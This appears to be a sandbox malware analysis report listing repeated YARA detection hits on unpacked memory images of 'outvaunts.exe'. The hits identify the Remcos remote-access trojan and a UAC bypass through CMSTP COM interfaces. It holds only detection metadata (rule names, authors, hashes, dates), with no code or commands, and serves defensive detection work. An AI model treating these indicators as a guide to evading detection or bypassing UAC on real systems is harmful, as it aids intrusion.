              Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
